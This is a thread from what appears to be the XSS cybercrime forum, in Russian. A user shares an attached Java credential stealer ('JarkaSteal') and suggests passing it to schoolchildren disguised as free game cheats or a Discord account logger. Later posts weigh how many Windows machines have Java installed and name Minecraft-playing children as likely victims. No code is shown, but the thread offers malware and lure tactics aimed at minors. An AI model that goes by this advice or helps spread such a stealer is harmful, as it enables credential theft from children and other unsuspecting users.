• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга слив стиллера на джава

кекич

RAID-массив
Пользователь
Реакции
11

1751976101799.png

когда-то сам попался, году в 20 :cool:
можно лить школьникам как "бесплатные супер крутые хитбоксы беспалевные" или "логер для получения акаунтов с сервера и отправкой в дискод"
использывать не советую стиллер ужасный

Вложения

• JarkaSteal-7679.zip
    40.3 КБ · Просмотры: 26
Пожалуйста, обратите внимание, что пользователь заблокирован
По сабжу: 3 миллиарда девайсов используют джаву, но на скольких вендах она будет установлена? По моим ощущением процентах на 15.

Да и все они почти корпы ;)
Забыл про школьников-майнкрафтеров

По сабжу: 3 миллиарда девайсов используют джаву, но на скольких вендах она будет установлена? По моим ощущением процентах на 15.
Сомнительно, может я конечно не объективный (Джава/Котлин Ван лав). Но раньше уж точно, что она во многих инсталяторах софтов/игр по дефолту стояло. Я имею ввиду установка jvm/jdk.

Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Но раньше уж точно, что она во многих инсталяторах софтов/игр по дефолту стояло. Я имею ввиду установка jvm/jdk
Не то чтобы много софтов и игр могу вспомнить, которые на жвм работают. Да и потом, в такие софты часто саму жвм вшивают. Например, у меня иде от жетбрейнсов, они все свои продукты на джавах и котлинах пишут, но при этом джава отдельно у меня не стоит, а жвм встроена в папке иде. При этом по умолчанию это не позволяет мне произвольные джарники запускать по условному двойному клику.

Не то чтобы много софтов и игр могу вспомнить, которые на жвм работают. Да и потом, в такие софты часто саму жвм вшивают. Например, у меня иде от жетбрейнсов, они все свои продукты на джавах и котлинах пишут, но при этом джава отдельно у меня не стоит, а жвм встроена в папке иде. При этом по умолчанию это не позволяет мне произвольные джарники запускать по условному двойному клику.
Вот хз, в Линукс устанавливалась по дефолту пакетом, пока Oracle не купил Java.

Последний год-полтора не запускал Винду, так что хз что там сейчас(Может я сейчас как тот дед что живёт ностальгией). Но в игровых инсталяторах часто видел. И тут не обязательно чтоб игра была на java, а например какая то дополнительная фигня и т.д.

На счёт IDE, ну с Android Studio перед установкой, я ещё с учебы ставлю JDK. Может ты и прав. Так как подобным образом задолго до этого например поступал Chrome с flash.

Последнее редактирование:

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх